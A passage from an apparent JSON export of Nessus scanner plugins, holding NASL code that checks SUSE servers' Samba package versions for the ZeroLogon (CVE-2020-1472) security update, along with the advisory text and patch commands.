flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-debugsource-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-debuginfo-4.4.2-38.36.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:33", "description": "This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nAdd 'libsmbldap0' to 'libsmbldap2' package to fix upgrades from previous versions. (bsc#1172810)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : samba (SUSE-SU-2020:2719-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt-devel", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard-devel", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi-devel", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials-devel", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors-devel", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb-devel", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-policy-devel", "p-cpe:/a:novell:suse_linux:libsamba-policy0", "p-cpe:/a:novell:suse_linux:libsamba-util-devel", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb-devel", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient-devel", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf-devel", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap-devel", "p-cpe:/a:novell:suse_linux:libsmbldap2", "p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util-devel", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient-devel", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-core-devel", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-2719-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143641", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2719-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143641);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES15 Security Update : samba (SUSE-SU-2020:2719-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some\nconfigurations when an attacker established a vulnerable Netlogon\nsecure channel connection to a domain controller, using the Netlogon\nRemote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nAdd 'libsmbldap0' to 'libsmbldap2' package to fix upgrades from\nprevious versions. (bsc#1172810)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172810\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202719-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a28b90e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-2719=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-2719=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-2719=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-2719=1\n\nSUSE Linux Enterprise High Availability 15 :\n\nzypper in -t patch SUSE-SLE-Product-HA-15-2020-2719=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-binding0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-binding0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-samr-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-samr0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-samr0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-krb5pac-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-krb5pac0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-krb5pac0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-nbt-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-nbt0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-nbt0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-standard-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-standard0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-standard0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libnetapi-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libnetapi0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libnetapi0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-credentials-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-credentials0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-credentials0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-errors-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-errors0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-errors0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-hostconfig-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-hostconfig0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-hostconfig0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-passdb-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-passdb0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-passdb0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", 